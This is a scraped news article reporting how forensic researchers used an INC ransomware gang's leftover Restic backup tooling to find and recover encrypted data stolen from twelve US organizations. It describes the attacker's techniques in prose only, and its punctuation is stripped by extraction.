INC ransomware opsec fail allowed data recovery for 12 US orgs

pMicrosoft New Windows LNK spoofing issues arent vulnerabilitiesppFake AI Chrome extensions with 300K users steal credentials emailsppApple fixes zeroday flaw used in extremely sophisticated attacksppMicrosoft February 2026 Patch Tuesday fixes 6 zerodays 58 flawsppMicrosoft fixes bug that blocked Google Chrome from launchingppRussia tries to block WhatsApp Telegram in communication blockadeppBitwarden introduces Cupid Vault for secure password sharingppCritical BeyondTrust RCE flaw now exploited in attacks patch nowppHow to access the Dark Web using the Tor BrowserppHow to enable Kernelmode Hardwareenforced Stack Protection in Windows 11ppHow to use the Windows Registry EditorppHow to backup and restore the Windows RegistryppHow to start Windows in Safe ModeppHow to remove a Trojan Virus Worm or other MalwareppHow to show hidden files in Windows 7ppHow to see hidden files in WindowsppQualys BrowserCheckppSTOPDecrypterppAuroraDecrypterppFilesLockerDecrypterppAdwCleanerppComboFixppRKillppJunkware Removal ToolppeLearningppIT Certification CoursesppGear GadgetsppSecurityppBest VPNsppHow to change IP addressppAccess the dark web safelyppBest VPN for YouTubeppppAn operational security failure allowed researchers to recover data that the INC ransomware gang stole from a dozen US organizationsppA deep forensic examination of the artifacts left behind uncovered tooling that had not been used in the investigated attack but exposed attacker infrastructure that stored data exfiltrated from multiple victimsppThe operation was conducted by Cyber Centaurs a digital forensics and incident response company that disclosed its success last November and now shared the full details with BleepingComputerppThe Cyber Centaurs investigation began after a client US organization detected ransomware encryption activity on a production SQL ServerppThe payload a RainINC ransomware variant was executed from the PerfLogs directory which is typically created by Windows However ransomware actors have begun to use it more frequently for stagingppThe researchers also noticed the presence of artifacts from the legitimate backup tool Restic although data exfiltration had occurred during the lateral movement stage and the threat actor had not used the utility in this attackppThis caused a shift in the researchers investigation from incident response to infrastructure analysisppThe traces that INC ransomware left behind included renamed binaries like winupdateexe PowerShell scripts to execute Restic hardcoded repository configuration variables and backup commandsppResticrelated remnants indicated that the threat actor was using the backup tool selectively as part of its operational toolkitppOne of the discovered PowerShell scripts newps1 contained Base64encoded commands for Restic and included hardcoded environment variables used to run the tool access keys repository paths and S3 passwords for encrypted repositoriesppIf INC routinely reused Resticbased infrastructure across campaigns then the storage repositories referenced in attacker scripts were unlikely to be dismantled once a ransom event concluded the researchers theorizedppInstead those repositories would likely persist as longlived attackercontrolled assets quietly retaining encrypted victim data well after negotiations ended or payments were madeppIf this were the case data stolen from other organizations could still be available in an encrypted form and could potentially be recovered from the backup serverppTo validate this hypothesis the team developed a controlled nondestructive enumeration process that confirmed the presence of encrypted data stolen from 12 unrelated organizations in the healthcare manufacturing technology and service sectors in the United StatesppNone of the organizations were Cyber Centaurs clients and the incidents were unrelated distinct ransomware eventsppThe researchers then decrypted the backups and preserved the copies while contacting law enforcement to help validate ownership and guide them through the proper procedureppThe Cyber Centaurs report lists multiple tools used in INC ransomware attacks which include among others cleanup tools remote access software and network scanners ppThe researchers also created YARA and Sigma rules to help defenders detect the Restic backup tool or its renamed binaries in the environment or running from suspicious locations which could signal a ransomware attack in developmentppINC ransomware is a ransomwareasaservice RaaS operation that emerged in mid2023ppThe threat actor claimed several highprofile victims over the years including Yamaha Motor Xerox Business Solution Scotlands NHS McLaren Health Care the Texas State Bar Ahold Delhaize the Panama Ministry of Economy the Pennsylvania AG Office and Crisis24ppModern IT infrastructure moves faster than manual workflows can handleppIn this new Tines guide learn how your team can reduce hidden manual delays improve reliability through automated response and build and scale intelligent workflows on top of tools you already useppRomanias oil pipeline operator Conpet confirms data stolen in attackppCrazy ransomware gang abuses employee monitoring tool in attacksppHackers breach SmarterTools network using flaw in its own softwareppPayments platform BridgePay confirms ransomware attack behind outageppCISA warns of SmarterMail RCE flaw used in ransomware attacksppNot a member yet Register NowppMicrosoft February 2026 Patch Tuesday fixes 6 zerodays 58 flawsppMicrosoft 365 outage takes down admin center in North AmericappMalicious 7Zip site distributes installer laced with proxy toolppBring observability to browserbased AI and user activityppOverdue a password healthcheck Audit your Active Directory for freeppBuild cyber resilience with Wazuh The opensource SIEM XDR for proactive protectionppAre your credentials in stealer logs Scan your organizations credential exposure nowppDiscover how to scale IT infrastructure reliably without adding toil or burnoutppTerms of Use Privacy Policy Ethics Statement Affiliate DisclosureppCopyright 2003 2026 Bleeping Computer LLC All Rights ReservedppNot a member yet Register NowppRead our posting guidelinese to learn what content is prohibitedp